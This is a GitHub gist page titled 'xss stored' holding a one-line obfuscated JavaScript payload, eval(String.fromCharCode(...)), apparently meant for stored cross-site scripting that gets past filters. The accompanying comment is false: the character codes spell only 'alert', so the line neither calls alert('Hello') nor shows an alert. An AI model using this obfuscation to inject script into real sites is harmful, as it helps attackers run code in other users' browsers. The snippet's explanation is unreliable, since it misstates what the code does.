-
-
Save c0d3x27/652d808a3a73b2555bfdc09dd0dffb94 to your computer and use it in GitHub Desktop.
xss stored
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
eval(String.fromCharCode(97, 108, 101, 114, 116)); | |
// Output: alert("Hello"); (executes the alert) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment